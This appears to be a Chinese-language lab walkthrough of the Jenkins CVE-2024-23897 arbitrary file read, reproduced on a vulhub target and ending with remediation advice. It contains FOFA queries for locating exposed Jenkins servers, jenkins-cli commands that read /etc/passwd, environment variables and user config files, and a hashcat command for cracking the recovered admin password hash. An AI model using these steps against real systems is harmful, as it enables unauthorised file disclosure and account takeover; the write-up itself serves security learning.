Jenkins是什么

Jenkins是一人基于Java開發的、可擴展的持續集成引擎，用于持續、自動地構建/測試軟件項目，可以監控一些定時執行的任務。

官網文檔：

Jenkins是一款開源 CI&CD 軟件，用于自動化各種任務，包括構建、測試和部署軟件。 Jenkins
支持各種運行方式，可通過系統包、Docker 或者通過一個獨立的 Java 程序。

持續集成引擎：
持續集成引擎就像是軟件開發中的智能管家，能自動收集開發人員編寫的代碼并整合到一起，然后像組裝機器一樣對代碼進行檢查和組裝，使其成為可運行的軟件，接著還會對軟件進行各種測試，一旦發現問題就及時告知開發人員，通過不斷地重復這些操作，確保軟件能快速、高質量地完成開發，而 Jenkins 就是這樣一個基于 Java 開發的、能實現這些功能的持續集成引擎工具。

CVE-2024-23897

CVE - 2024 - 23897是Jenkins存在的一個任意文件讀取漏洞。Jenkins為用戶提供了命令行接口，用戶能夠借助jenkins - cli.jar調用該接口，進而執行Jenkins的部分功能。然而，當使用jenkins - cli.jar執行命令行操作時，服務端會利用第三方庫args4j對命令行進行解析。在解析過程中，若參數以@開頭，系統就會把它認定為一個文件名，隨后讀取該文件的內容并將其作為參數。這一機制存在風險，一旦參數設置不當，就可能引發報錯，且報錯信息會將文件內容顯示出來，從而導致任意文件讀取的情況發生。
目前我的能力只能把漏洞打一遍，原理分析請看P神的原理分析文章
受影響版本：
Jenkins 版本<= 2.441
Jenkins 版本<= LTS 2.426.2

fofa：

app="jenkins"

or

header="X-Jenkins" || banner="X-Jenkins" || header="X-Hudson" || banner="X-Hudson" || header="X-Required-Permission: hudson.model.Hudson.Read" || banner="X-Required-Permission: hudson.model.Hudson.Read" || body="Jenkins-Agent-Protocols"

vulhub開啟靶場環境，訪問本機8080端口

訪問http://靶場IP:8080/jnlpJars/jenkins-cli.jar

觸發漏洞，但是這個命令只能讀取部分內容

java -jar .\jenkins-cli.jar -s http://127.0.0.1:8080/ -http help 1 "@etc/passwd"

讀取/proc/self/environ

一些命令輸出行數較多，比如connect-node這個命令

java -jar .\jenkins-cli.jar -s http://127.0.0.1:8080/  connect-node "@etc/passwd"

如果開啟了Allow anonymous read access就可以讀取全部文件內容，靶場應該是默認開啟了
Jenkins 安裝將有一個文件/var/jenkins_home/users/users.xml，其中列出了此處的所有有效用戶

java -jar jenkins-cli.jar -s http://localhost:8080/ connect-node "/var/jenkins_home/users/users.xml"

這里讀出來admin
users.xml顯示系統上的單個用戶，admin，其信息文件夾為/var/jenkins_home/users/admin_5965741382068509608
在 Jenkins 上的每個用戶文件夾中，始終有一個包含用戶密碼哈希的config.xml文件。
所以現在讀取/var/jenkins_home/users/admin_5965741382068509608/config.xml

java -jar jenkins-cli.jar -s http://localhost:8080/ connect-node "/var/jenkins_home/users/admin_5965741382068509608/config.xml"

讀取到：

<passwordHash>#jbcrypt:$2a$10$b3fbT8hnHMeZ4CfoVZLTQOgAYbbl8nlQfVGeMhEozzooQDABlEtOG</passwordHash>

下面用kali自帶字典和工具爆破密碼

首先把$2a$10$b3fbT8hnHMeZ4CfoVZLTQOgAYbbl8nlQfVGeMhEozzooQDABlEtOG寫入txt文件，再把rockyou.txt復制到當前路徑

hashcat -m 3200 info.txt rockyou.txt

開始爆破

但是尷尬了，報錯* Device #1: Not enough allocatable device memory for this attack.我kali內存不夠了，當時只分配了2G。
這邊就直接說密碼了，vulhub環境這個Jenkins密碼是vulhub。用admin/vulhub登錄成功。
登進后臺安全管理界面可以發現Allow anonymous read access恰好是開啟的。

總結

Jenkins提供了一個命令行的接口，jenkins-clijar是它的命令行客戶端，通過jenkins-clijar可以去執行一些Jenkins中的功能。
利用條件：Jenkins 版本<= 2.441 和Jenkins 版本<= LTS 2.426.2+開啟了Allow anonymous read access（讀取完整文件）
流程：

因此根本原因是args4j這個庫解析參數不當造成的

修復建議

Jenkins更新到最新版本
禁用Allow anonymous read access選項